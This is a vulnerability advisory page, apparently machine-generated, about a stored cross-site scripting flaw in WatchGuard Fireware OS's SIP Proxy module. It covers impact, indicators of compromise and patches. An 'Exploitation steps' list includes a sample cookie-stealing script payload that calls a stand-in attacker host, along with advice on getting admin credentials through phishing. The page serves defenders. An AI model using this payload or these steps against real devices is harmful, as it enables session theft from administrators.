CVE-2026-13377
WatchGuard Firebox vulnerability analysis and mitigation

Overview

CVE-2026-13377 is a Stored Cross-Site Scripting (XSS) vulnerability in the SIP Proxy module of WatchGuard Fireware OS, classified under CWE-79. It represents an additional unmitigated attack path related to CVE-2025-6947. Affected versions include Fireware OS 12.0 through 12.12, 12.5 through 12.5.18, and 2025.1 through 2026.2. The vulnerability was published on July 3, 2026, with a patch advisory issued by WatchGuard. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 4.8 (Medium) (GitHub Advisory, WatchGuard Advisory).

Technical details

The vulnerability (CWE-79) stems from improper neutralization of user-controllable input in the SIP Proxy module before it is rendered in the Fireware OS web management interface. An attacker with high privileges can inject malicious scripts into SIP Proxy configuration fields; these scripts are persistently stored and subsequently executed in the browsers of other users who access the web interface (Stored XSS). Exploitation requires network access, high privileges on the device, and passive user interaction (a victim must view the affected page). This CVE is explicitly described as an additional unmitigated attack path for CVE-2025-6947, suggesting the original fix for that vulnerability did not fully close all injection vectors in the SIP Proxy module (GitHub Advisory, WatchGuard Advisory).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript in the SIP Proxy module, which executes in the browsers of authenticated users accessing the Fireware web management interface. This can result in session token theft, unauthorized actions performed on behalf of authenticated administrators, or redirection of users to malicious sites. While direct impact on the vulnerable system's confidentiality and availability is rated as none, the subsequent system impact includes low confidentiality and integrity compromise — primarily through browser-side data exposure and unauthorized interface manipulation (GitHub Advisory, WatchGuard Advisory).

Exploitability

As of the time of publication, there is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The NVD SSVC assessment confirms exploitation status as "none" and the vulnerability is not automatable. The EPSS score is approximately 0.158% (0.00258), placing it in the 5th percentile for exploitation likelihood within 30 days. No threat actor attribution has been reported, and the CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify WatchGuard Fireware OS devices running affected versions (12.0–12.12, 12.5–12.5.18, or 2025.1–2026.2) with the web management interface accessible over the network.
  2. Obtain high-privilege credentials: Acquire administrative credentials for the Fireware web interface through phishing, credential reuse, or other means, as the vulnerability requires high privileges to inject the payload.
  3. Navigate to SIP Proxy configuration: Log into the Fireware web management interface and locate the SIP Proxy module settings, which are vulnerable to stored XSS input.
  4. Inject malicious payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a SIP Proxy configuration field that is not properly sanitized before storage.
  5. Wait for victim interaction: When another authenticated user (e.g., an administrator) views the affected SIP Proxy configuration page, the stored script executes in their browser.
  6. Harvest session tokens or perform actions: The executed script can exfiltrate session cookies, perform authenticated actions on behalf of the victim, or redirect the victim's browser to an attacker-controlled site (GitHub Advisory, WatchGuard Advisory).

Indicators of compromise

  • Network: Outbound HTTP/S requests from administrator browsers to unexpected external domains shortly after accessing the Fireware web interface; unusual GET requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: Fireware web interface access logs showing modifications to SIP Proxy configuration fields containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, javascript:); repeated access to SIP Proxy configuration pages by multiple user accounts in a short timeframe.
  • File System / Configuration: SIP Proxy configuration entries containing unexpected HTML or JavaScript content when reviewed via CLI or exported configuration files.
  • Browser: Unexpected redirects or pop-ups experienced by administrators when accessing the Fireware web management interface SIP Proxy section.

Mitigation and workarounds

WatchGuard has released patches addressing this vulnerability; fixed versions are Fireware OS 12.12.1 (for the 12.x branch) and 2026.2.1 (for the 2025.x/2026.x branch). Organizations should upgrade to these patched versions as the primary remediation (WatchGuard Advisory). As interim mitigations, restrict access to the Fireware web management interface to trusted internal networks only, implement Web Application Firewall rules to detect and block XSS payloads in SIP-related traffic, and monitor SIP Proxy configuration fields for unexpected script content. Avoid granting administrative access to untrusted users until patching is complete.

Additional resources


SourceThis report was generated using AI

Related WatchGuard Firebox vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-13722HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13384HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13383HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-8247HIGH7.7
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13728MEDIUM5.9
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management